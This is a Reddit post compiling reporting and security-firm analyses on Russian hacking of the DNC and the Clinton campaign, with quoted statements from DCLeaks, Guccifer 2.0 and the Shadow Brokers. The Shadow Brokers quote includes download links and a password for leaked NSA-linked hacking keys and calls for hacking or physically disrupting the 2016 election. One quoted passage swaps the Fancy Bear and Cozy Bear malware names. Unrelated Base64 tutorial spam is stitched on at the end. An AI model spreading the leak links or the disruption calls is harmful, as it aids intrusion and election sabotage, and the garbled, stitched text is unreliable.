For the next two days, three CrowdStrike employees worked inside DNC headquarters, replacing the software and setting up new login credentials using what Alperovitch considers to be the most secure means of choosing a password: flipping through the dictionary at random. (After this article was posted online, Alperovitch noted that the passwords included random characters in addition to the words.) The Overwatch team kept an eye on Falcon to ensure there were no new intrusions. On Sunday night, once the operation was complete, Alperovitch took his team to celebrate at the Brazilian steakhouse Fogo de Chão.
...
Aperovitch's June 14 blog post garnered so much media attention that even its ebullient author felt slightly overwhelmed. Inevitably there were questions about the strange names his company had given the Russian hackers. As it happened, "Fancy Bear" and "Cozy Bear" were part of a coding system Alperovitch had created. Animals signified the hackers' country of origin: Russians were bears, Chinese were pandas, Iranians were kittens, and North Koreans were named for the chollima, a mythical winged horse. By company tradition, the analyst who discovers a new hacker gets to choose the first part of the nickname. Cozy Bear got its nickname because the letters coz appeared in its malware code. Fancy Bear, meanwhile, used malware that included the word Sofacy, which reminded the analyst who found it of the Iggy Azalea song "Fancy."
The day after the media maelstrom, the reporters were back with less friendly questions: Had Alperovitch gotten his facts right? Was he certain Russia was behind the DNC hacks? The doubts were prompted by the appearance of a blogger claiming to be from Eastern Europe who called himself Guccifer 2.0. Guccifer said that the breach was his, not Russia's. "DNC'S servers hacked by a lone hacker," he wrote in a blog post that included stolen files from the DNC. "I guess CrowdStrike customers should think twice about company's competence," Guccifer wrote. "Fuck CrowdStrike!!!!!!!!!"
an incorrect attribution in public. "Did we miss something?" he asked CrowdStrike's forensics team. Henry and his staff went back over the evidence, all of which supported their original conclusion.
Alperovitch had also never seen someone claim to be the only intruder on a site. "No hacker goes into the network and does a full forensic investigation," he told me. Being called out, he said, was "very shocking. It was clearly an attack on us as well as on the DNC."
Alperovitch initially thought that the leaks were standard espionage and that Guccifer's attacks on CrowdStrike were just a noisy reaction to being busted. "I thought, Okay, they got really upset that they were caught," he said. But after documents from the DNC continued to leak, Alperovitch decided the situation was far worse than that. He concluded that the Russians wanted to use the leaked files to manipulate U. S. voters—a first. "It hit me that, holy crap, this is an influence operation. They're actually trying to inject themselves into the election," he said. "I believe that we may very well wake up on the morning the day after the election and find statements from Russian adversaries saying, 'Do not trust the result.' "
...
Days later, Alperovitch got a call from a Reuters reporter asking whether the Democratic Congressional Campaign Committee had been hacked. CrowdStrike had, in fact, been working on a breach at the DCCC; once again, Alperovitch believed that Russia was responsible. Now, however, he suspected that only Fancy Bear was involved. A lawyer for the DCCC gave Alperovitch permission to confirm the leak and to name Russia as the suspected author.
Two weeks later, files from the DCCC began to appear on Guccifer 2.0's website. This time he released information about Democratic congressional candidates who were running close races in Florida, Ohio, Illinois, and Pennsylvania. On August 12, he went further, publishing a spreadsheet that included the personal email addresses and phone numbers of nearly two hundred Democratic members of Congress.
...
Alperovitch's friends in government told him privately that an official attribution so close to the election would look political. If the government named Russia, it would be accused of carrying water for Hillary Clinton. The explanations upset Alperovitch. The silence of the American government began to feel both familiar and dangerous. "It doesn't help us if two years from now someone gets indicted," he said. After Michelle Obama's passport was published online, on September 22, Alperovitch threw up his hands in exasperation. "That is Putin giving us the finger," he told me.
Source: The Russian Expat Leading the Fight to Protect America
The guy responsible for ousting Stuxnet as being an American/Israeli cyberworm (no friend of the U.S. government/establishment) also says that his company, Symantec, has found that Russia was responsible for the leaks:
It is pretty clear judging by the indicators of compromise [IOCs]. The binaries that were used to hack the DNC as well as Podesta’s email as well as some other Democratic campaign folks, those IOCs match binaries and also infrastructure that was used in attacks that were previously recorded by others as having Russian origin. That much we can confirm. So if you believe other people’s—primarily government’s—attribution that those previous attacks were Russian, then these attacks are definitely connected. We’re talking about the same binaries, the same tools, the same infrastructure.
We’ve analyzed the tools, the binaries, and the infrastructure that was used in the attack, and from that we can confirm that it’s connected to a group that has two names. One is Sofacy, or “Cozy Bear,” and The Dukes, which is also known as “Fancy Bear.” From the binary analysis point of view, I can tell you that the activities of these attackers have been during Russian working hours, either centered on UTC+3 or UTC+4; they don’t work Russian holidays; they work Monday to Friday; there are language identifiers inside that are Russian; when you look at all the victim profiles they would be in interest to the Russian nation-state. So all of that stuff fits the profile. Now, could all those things be false flags? Sure. Other government entities obviously have come out and said it is the Russian state, and the binary forensics would definitely match that.
There was another attack that happened in the Ukraine. So in December, in the Ukraine, all the power went out to about 260,000 households, or customers. They basically infiltrated the power company, got access to the machines that controlled the power, they flipped the computer switches off and shut down the power, and then they began to wipe all the machines and devices—overriding the hard drives and trashing the machines so that they couldn’t be started up again, or so that the switches couldn’t come on again. Ukrainians were able to get power back after six hours by switching to manual mode. They went off their computer monitor mode and physically flipped the switches to bring the power back up. What’s interesting about that case is the fact that they were more behind technologically actually helped them. Something very similar could easily happen in the U.S. and we’re much more beholden to computing infrastructure here, so our ability to switch to manual mode here would be much more difficult.
Is there linkage between the DNC and Podesta hacks and the 2014 State Department hacks that were also believed to be carried out by Russia?
Yeah, these are being conducted by the same groups. We know that from the IOCs—by looking at the tools they use and the infrastructure they use.
Many of these attacks were happening prior to the nomination of Trump. Based on that theory, people believe that there was a general plan for disruption, and it may be the case now that the easiest and best way to do so is in the manner you speak, but these attacks did not just start happening post-Trump’s nomination. So in that sense, there is a feeling that it’s not a very Trump-specific activity versus an election disruption activity. This is the easiest way for them to disrupt the election.
Source: Cybersecurity Expert: Proof Russia Behind DNC, Podesta Hacks
Another cybersecurity company, SecureWorks, has published some interesting blogposts about all this:
In mid-2015, CTU researchers discovered TG-4127 using the accoounts-google . com domain in spearphishing attacks targeting Google Account users. The domain was used in a phishing URL submitted to Phishtank, a website that allows users to report phishing links (see Figure 1).
Figure 1. Example of accoounts-google . com used in a phishing URL.
Recipients who clicked the link were presented with a fake Google Account login page (see Figure 2). The threat actors could use entered credentials to access the contents of the associated Gmail account.
Figure 2. Fake Google Account login page.
Encoded target details
Analysis of the phishing URL revealed that it includes two Base64-encoded values (see Figure 3). The decoded Base64 values (see Table 1) match the Gmail account and its associated Google Account username. If a target clicks the phishing link, the username field of the displayed fake Google Account login page is prepopulated with the individual’s email address.
Figure 3. Spearphishing URL.
Table 1. Decoded Base64 values from the phishing URL used by TG-4127.
Use of the Bitly URL-shortening service
A Bitly URL was uploaded to Phishtank at almost the same time as the original spearphishing URL (see Figure 4).
Figure 4. Bitly phishing URL submitted at same time as accoounts-google . com phishing URL.
Using a tool on Bitly’s website, CTU researchers determined that the Bitly URL redirected to the original phishing URL (see Figure 5). Analysis of activity associated with the Bitly account used to create the shortened URL revealed that it had been used to create more than 3,000 shortened links used to target more than 1,800 Google Accounts.
Figure 5. Link-shortener page for bit.ly/1PXQ8zP that reveals the full URL.
Target analysis
CTU researchers analyzed the Google Accounts targeted by TG-4127 to gain insight about the targets and the threat group’s intent.
Focus on Russia and former Soviet states
Most of the targeted accounts are linked to intelligence gathering or information control within Russia or former Soviet states. The majority of the activity appears to focus on Russia’s military involvement in eastern Ukraine; for example, the email address targeted by the most phishing attempts (nine) was linked to a spokesperson for the Ukrainian prime minister. Other targets included individuals in political, military, and diplomatic positions in former Soviet states, as well as journalists, human rights organizations, and regional advocacy groups in Russia.
Other targets worldwide
Analysis of targeted individuals outside of Russia and the former Soviet states revealed that they work in a wide range of industry verticals (see Figure 6). The groups can be divided into two broad categories:
TG-4127 likely targeted the groups in the first category because they criticized Russia. The groups in the second category may have information useful to the Russian government.
Figure 6. TG-4127 targeting outside of Russia and former Soviet states.
Authors and journalists
More than half (53%) of the targeted authors and journalists are Russia or Ukraine subject matter experts (see Figure 7). It is likely that the Russian state has an interest in how it is portrayed in the media. U.S.-based military spouses who wrote online content about the military and military families were also targeted. The threat actors may have been attempting to learn about broader military issues in the U.S., or gain operational insight into the military activity of the target’s spouse.
Figure 7. Subject matter expertise of authors and journalists targeted by TG-4127.
Government supply chain
CTU researchers identified individuals who were likely targeted due to their position within the supply chain of organizations of interest to TG-4127 (e.g., defense and government networks). Figure 8 shows the distribution by category. The targets included a systems engineer working on a military simulation tool, a consultant specializing in unmanned aerial systems, an IT security consultant working for NATO, and a director of federal sales for the security arm of a multinational technology company. The threat actors likely aimed to exploit the individuals’ access to and knowledge of government clients’ information.
Figure 8. Categories of supply chain targets.
Government / military personnel
TG-4127 likely targeted current and former military and government personnel for potential operational insight gained from access to their personal communications. Most of the activity focused on individuals based in the U.S. or working in NATO-linked roles (see Figure 9).
Figure 9. Nation or organization of government/military targets.
TG-4127 targeted high-profile Syrian rebel leaders, including a leader of the Syrian National Coalition. Russian forces have supported Syrian President Bashar al-Assad’s regime since September 2015, so it is likely the threat actors are seeking to gain intelligence on rebel forces to assist Russian and Assad regime military operations.
Success of the phishing campaign
CTU researchers analyzed 4,396 phishing URLs sent to 1,881 Google Accounts between March and September, 2015. More than half (59%) of the URLs were accessed, suggesting that the recipients at least opened the phishing page. From the available data, it is not possible to determine how many of those Google Accounts were compromised. Most of the targeted accounts received multiple phishing attempts, which may indicate that previous attempts had been unsuccessful. However, 35% of accounts that accessed the malicious link were not subject to additional attempts, possibly indicating that the compromise was successful.
Of the accounts targeted once, CTU researchers determined that 60% of the recipients clicked the malicious Bitly. Of the accounts that were targeted more than once, 57% of the recipients clicked the malicious link in the repeated attempts. These results likely encourage threat actors to make additional attempts if the initial phishing email is unsuccessful.
Source: Threat Group-4127 Targets Google Accounts
Here's another article by SecureWorks:
Spearphishing details
The short links in the spearphishing emails redirected victims to a TG-4127-controlled URL that spoofed a legitimate Google domain. A Base64-encoded string containing the victim's full email address is passed with this URL, prepopulating a fake Google login page displayed to the victim. If a victim enters their credentials, TG-4127 can establish a session with Google and access the victim's account. The threat actors may be able to keep this session alive and maintain persistent access.
Hillary for America
TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account. When presented with TG-4127's spoofed login page (see Figure 1), victims might be convinced it was the legitimate login page for their hillaryclinton.com email account.
Figure 1. Example of a TG-4127 fake Google Account login page.
CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016; the last link was created in mid-May. During this period, TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain. Through open-source research, CTU researchers identified the owners of 66 of the targeted email addresses. There was no open-source footprint for the remaining 42 addresses, suggesting that TG-4127 acquired them from another source, possibly other intelligence activity.
The identified email owners held a wide range of responsibilities within the Hillary for America campaign, extending from senior figures to junior employees and the group mailboxes for various regional offices. Targeted senior figures managed communications and media affairs, policy, speech writing, finance, and travel, while junior figures arranged schedules and travel for Hillary Clinton's campaign trail. Targets held the following titles:
Publicly available Bitly data reveals how many of the short links were clicked, likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page. Only 20 of the 213 short links have been clicked as of this publication. Eleven of the links were clicked once, four were clicked twice, two were clicked three times, and two were clicked four times.
Democratic National Committee
CTU researchers do not have evidence that these spearphishing emails are connected to the DNC network compromise that was revealed on June 14. However, a coincidence seems unlikely, and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network.
Personal email accounts
CTU researchers identified TG-4127 targeting 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign, the DNC, or other aspects of U.S. national politics. Five of the individuals also had a hillaryclinton.com email account that was targeted by TG-4127. Many of these individuals held communications, media, finance, or policy roles. They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC. TG-4127 created 150 short links targeting this group. As of this publication, 40 of the links have been clicked at least once.
Related activity and implications
Although the 2015 campaign did not focus on individuals associated with U.S. politics, open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. White House in early 2015. The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party. CTU researchers have not observed TG-4127 use this technique (using Bitly short links) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May.
Source: Threat Group-4127 Targets Hillary Clinton Presidential Campaign
Read these two articles for more context:
How Hackers Broke Into John Podesta and Colin Powell’s Gmail Accounts
How Russia Pulled Off the Biggest Election Hack in U.S. History
Guccifer2.0, The Shadow Brokers, and DCLeaks, who have all leaked U.S. documents/cyberweapons, love talking about the "U.S. elite" and "corruption" in America, along with saying "the elections are rigged." I wonder why these people suddenly became so interested in the U.S. election?
Regardless, we know from the Bit.ly victim profiles that Podesta, the DNC, Ukrainian/Russian journalists, Bellingcat and other enemies of Russia were targeted by these groups. This also means that those targeted by DCLeaks and Guccifer2.0 were the same people, and that the aforementioned entities are actually one.
Why would they lie about being separate groups?
Lastly, I have gone through all the public statements made by these groups, by going through their TwitteTumblMedium/WordPress/web posts. Here are some of the comments made by DCLeaks, Guccifer2.0 and The Shadow Brokers. Tell me if you notice a common theme:
DCLeaks
Known for hacking the emails of former Secretary of State Colin Powell and former NATO General Breedlove, as well as Soros' OSF intranet documents.
George Soros is a Hungarian-American business magnate, investor, philanthropist, political activist and author who is of Hungarian-Jewish ancestry and holds dual citizenship. He drives more than 50 global and regional programs and foundations. Soros is named an architect and a sponsor of almost every revolution and coup around the world for the last 25 years. The USA is thought to be a vampire due to him and his puppets, not a lighthouse of freedom and democracy. His minions spill blood of millions and millions of people just to make him even more rich. Soros is an oligarch sponsoring the Democratic party, Hillary Clinton, hundreds of politicians all over the world. This website is designed to let everyone inside George Soros’ Open Society Foundation and related organisations. We present you the workplans, strategies, priorities and other activities of Soros. These documents shed light on one of the most influential network operating worldwide.
Source: http://soros.dcleaks.com
Welcome another cog in the U.S. political and military machine. CAPT Pistole's emails released
documents reveal the billionaire’s attempt to organize a “national movement” to create a federalized police force.
Looks like Clinton's staff doesn't care about security.Wonder from whom did they learn it..
FBI hq is a great place for club meeting especially when Clinton is under investigation
A further look at their Twitter account reveals that they mostly re-tweet WikiLeaks/RT/PressTV, hate Clinton, like Trump, love talking about the email scandal, post conspiracy theories about Mark Zuckerberg, exclusively target Russia's enemies (like former NATO General Breedlove, Soros, Colin Powell, etc,.), defend Russia from being attacked, and have a penchant for focusing on news portraying the U.S. elections/debates as "rigged":
Check the private correspondence between Philip Breedlove and Harlan Ullman
Check restricted documents of George Soros’ Open Society Foundation
Check restricted documents leaked from Hillary Clinton's presidential campaign staff
Emails show Obama saw US involvement in Russia talks as a 'threat'
'Gen. plotted against Obama on Russia'
Check George Soros's OSF plans to counter Russian policy and traditional values
Check Soros internal files
A New McCarthyism: @ggreenwald on Clinton Camp's Attempts to Link @wikileaks, Trump & @DrJillStein to Russia
Source: https://twitter.com/dcleaks_
Guccifer 2.0
Known for hacking the DNC and DCCC.
Together we’ll be able to throw off the political elite, the rich clans that exploit the world!
Fuck the lies and conspirators like DNC!!!
Who inspires me? Not the guys like Rambo or Terminator or any other like them. The world has changed. Assange, Snowden, and Manning are the heroes of the computer age. They struggle for truth and justice; they struggle to make our world better, more honest and clear. People like them make us hope for tomorrow. They are the modern heroes, they make history right now.
Marcel Lazar is another hero of mine. He inspired me and showed me the way. He proved that even the powers that be have weak points.
Anyway it seems that IT-companies and special services can’t realize that people like me act just following their ideas but not for money. They missed the bus with Assange and Snowden, they are not ready to live in the modern world. They are not ready to meet people who are smart and brave, who are eager to fight for their ideals, who can sacrifice themselves for the better future. Working for a boss makes them slow I suppose. Do you need more proof?
don’t want to disappoint anyone, but none of the candidates has my sympathies. Each of them has skeletons in the closet and I think people have a right to know the truth about the politicians.
As for me, I see great differences between Hillary Clinton and Donald Trump. Hillary seems so much false to me, she got all her money from political activities and lobbying, she is a slave of moguls, she is bought and sold. She never had to work hard and never risked everything she had. Her words don’t meet her actions. And her collusion with the DNC turned the primaries into farce.
Opposite to her, Donald Trump has earned his money himself. And at least he is sincere in what he says. His position is straight and clear.
Anyway that doesn’t mean that I support him. I’m totally against his ideas about closing borders and deportation policy. It’s a nonsense, absolute bullshit.
I have nothing to say about Bernie Sanders. It seems he never had a chance to win the nomination as the Democratic Party itself stood against him!
Here are the DCCC docs on Florida: reports, memos, briefings, dossiers, etc. You can have a look at who you are going to elect now. It may seem the congressional primaries are also becoming a farce.
As you can see, the private server of the Clinton clan contains docs and donors lists of the Democratic committees, PACs, etc. Does it surprise you?
It looks like big banks and corporations agreed to donate to the Democrats a certain percentage of the allocated TARP funds.
I found out something interesting in emails between DNC employees and Hillary Clinton campaign staff. Democrats prepare a new provocation against Trump. After Trump sent his financial report in May it appeared on DNC servers at once. DNC rushed to analyze it and asked the Jones Mandel company to make an effective investigation. I won’t be surprised if some mainstream media like the New York Times or CNN publish soon Trump’s financial docs. No doubt who could give them.
I’d like to warn you that the Democrats may rig the elections on November 8. This may be possible because of the software installed in the FEC networks by the large IT companies.
As I’ve already said, their software is of poor quality, with many holes and vulnerabilities.
I have registered in the FEC electronic system as an independent election observer; so I will monitor that the elections are held honestly.
I also call on other hackers to join me, monitor the elections from inside and inform the U.S. society about the facts of electoral fraud.
Source: https://guccifer2.wordpress.com
Here and here he claims that he's the source of WikiLeaks' DNC documents, something that has gone unreported in the media.
He frequently re-tweets WikiLeaks, just like DCLeaks. He re-tweets and follows conspiracy theory outlets like Alex Jones and Roger Stone, just like DCLeaks followed RT and PressTV. Of course, he sprang back to life two days ago, right before Election Day, to complain about "Democrats rigging the election." I thought he didn't favour any political party?
Source: https://twitter.com/GUCCIFER_2
The Shadow Brokers
Known for leaking the NSA's elite hacking entity's, Equation Group's, cyberweapons.
!! Attention Wealthy Elites !!!
We have final message for “Wealthy Elites”. We know what is wealthy but what is Elites? Elites is making laws protect self and friends, lie and fuck other peoples. Elites is breaking laws, regular peoples go to jail, life ruin, family ruin, but not Elites. Elites is breaking laws, many peoples know Elites guilty, Elites call top friends at law enforcement and government agencies, offer bribes, make promise future handjobs, (but no blowjobs). Elites top friends announce, no law broken, no crime commit. Reporters (not call journalist) make living say write only nice things about Elites, convince dumb cattle, is just politics, everything is awesome, check out our ads and our prostitutes. Then Elites runs for president. Why run for president when already control country like dictatorship? What this have do with fun Cyber Weapons Auction? We want make sure Wealthy Elite recognizes the danger cyber weapons, this message, our auction, poses to their wealth and control. Let us spell out for Elites. Your wealth and control depends on electronic data. You see what “Equation Group” can do. You see what cryptolockers and stuxnet can do. You see free files we give for free. You see attacks on banks and SWIFT in news. Maybe there is Equation Group version of cryptolocker+stuxnet for banks and financial systems? If Equation Group lose control of cyber weapons, who else lose or find cyber weapons? If electronic data go bye bye where leave Wealthy Elites? Maybe with dumb cattle? “Do you feel in charge?” Wealthy Elites, you send bitcoins, you bid in auction, maybe big advantage for you?
Source: https://archive.is/WkT7o#selection-337.0-341.1595
TheShadowBrokers is having special trick or treat for Amerikanskis tonight. But first questions.
Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?
Let us be speaking regarding corruption. If Peoples#1 is having $1.00 and Peoples#2 is having $1000.00 which peoples is having more money? Which peoples is having more spending power? Voter$1 is giving $1 to politician and Voter$1000 is giving $1000 to politician, which voters is having more political power? Is both voters having equal political power? “one person, one vote”? Politicians, lobbyist, media, even SCOTUS (supreme court) is saying this is being true, money is not corrupting. In binary world, maybe. But world is not being binary, is it? What about peoples#3, VoterUndecided? VoterUndecided is giving no moneys and no votes. Politician is needing money for campaign to buy advertising, positive media stories, advisors, pollsters, operatives to be making VoterUndecided vote for politician. Political fundrasing, now which voter is having more political power? VoterUndecided votes for politician and politician wins. Re-election is coming. Government budget decision is required. Voter$1 is wanting politician to be spending taxes on education for making children into great thinkers, leaders, scientists. Voter$1000 is shareholder of defense & intelligence company is wanting politician spending taxes on spying and war to be making benefit self, for great profit. Political favors, now, which voter is having more political power? Did theshadowbrokers lose Amerikanskis? Amerikanskis is still thinking “one person, one vote”? Money isn’t corrupting elections, politics, govenments?
USSA elections is coming! 60% of Amerikansky never voting. Best scenario is meaning half of remaining red or blue fanatics or 20% of the most fanatical is picking USSA government? A great power. A free country. A good-doer. TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped election from coming? Maybe hacking election is being the best idea? #hackelection2016. If peoples is not being hackers, then #disruptelection2016, #disruptcorruption2016. Maybe peoples not be going to work, be finding local polling places and protesting, blocking , disrupting , smashing equipment, tearing up ballots? The wealthy elites is being weakest during elections and transition of power. Is being why USSA is targeting elections in foreign countries. Don’t beleiving? Remembering Iran elections? Rembering stuxnet? Maybe is not Russia hacking election, maybe is being payback from Iran?
Ok peoples theshadowbrokers is promising you a trick or treating, here it is
https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ https://yadi.sk/d/NCEyJQsBxrQxz
Password = payus
This is being equation group pitchimpair (redirector) keys, many missions into your networks is/was coming from these ip addresses. Is being unfortunate no peoples is already owning eqgrp_auction_file. Auction file is having tools for to making connect to these pitchimpairs. Maybe tools no more installed? Maybe is being cleaned up? To peoples is being owner of pitchimpair computers, don’t be looking for files, rootkit will self destruct. Be making cold forensic image. @GCHQ @Belgacom TheShadowBrokers is making special effort not to using foul language, bigotry, or making any funny. Be seeing if NBC, ABC, CBS, FOX is making stories about now? Maybe political hacks is being more important?
How bad do you want it to get? When you are ready to make the bleeding stop, payus, so we can move onto the next game. The game where you try to catch us cashing out! Swag us out!
Source: https://medium.com/@shadowbrokerss/message-5-trick-or-treat-e43f946f93e6#.9cfljtkx3
Again, the usual old spiel of brave hackers fighting "USSA"/"Amerikansky" "corruption". It's gotten quite repetitive by now.
Bizarrely, they began posting Bill Clinton and Lorreta Lynch erotic fan fiction at some point:
https://medium.com/@shadowbrokerss/begin-pgp-signed-message-hash-sha1-2a9aa03838a4#.896d0iqpi
submitted by DownWithAssad to geopolitics [link] [comments]

Blockchain tutorial 13.1: Base-58 encoding Base64 Encoding Technique - Passing JSON Payload in GET ... Using MD5 and Base64 encoding to hash passwords What is Base64? - YouTube ESP32 Arduino: Base64 encoding (using crypto/base64 lib)

Base64 The term Base64 is coming from a certain MIME content transfer encoding. Basically, Base64 is a collection of related encoding designs which represent the binary information in ASCII format by converting it into a base64 representation. Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME content transfer encoding.. Base64 encoding schemes are commonly used when there is a need to encode binary data that needs to be stored and transferred over media that are designed to ... This example use a simple text, but lot's of other format like image or binary data can be base64 encoded as well. Base64 encode and decode Details Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. Base58 algorithm is a group of binary-to-text encoding schemes used to represent large integers as alphanumeric text. Base58 is widely used in Bitcoin, blockchain and cryptocurrency community. Take a look how to decode and encode Base58. You can also embed data into the Bitcoin blockchain. We are social Fork me on GitHub

[index] [9511] [22133] [10172] [29545] [14654] [30175] [8951] [8158] [2967] [33557]

Blockchain tutorial 13.1: Base-58 encoding

This tutorial explains how to encode a plain text string into base64 format, using the ESP32 and the Arduino core. **IMPORTANT NOTE**: as indicated in the implementation file of the library, the ... How to Decode the Base64 encrypted code ----- Hi, Friends today i will share you how to decode the base64 format code. what is base64 it is a one of the encryption method to hide the real data ... CORRECTION: At 2:17, a header says "BYTES" when it should say "BASE64 CHARACTERS" instead. So what is Base64? You hear about it every now and then when you w... Base64 Encoding in JavaScript - Explained (with usage examples) - Duration: 11:01. dcode 9,534 views. 11:01. How to Decode base64(gzuncompress(base64 encrypted code - Duration: 9:33. Bitcoin released as open source software in 2009 is a cryptocurrency invented by Satoshi Nakamoto (unidentified person or group of persons). ... Base64 encoding/decoding in java 8 - Duration: 10 ...

#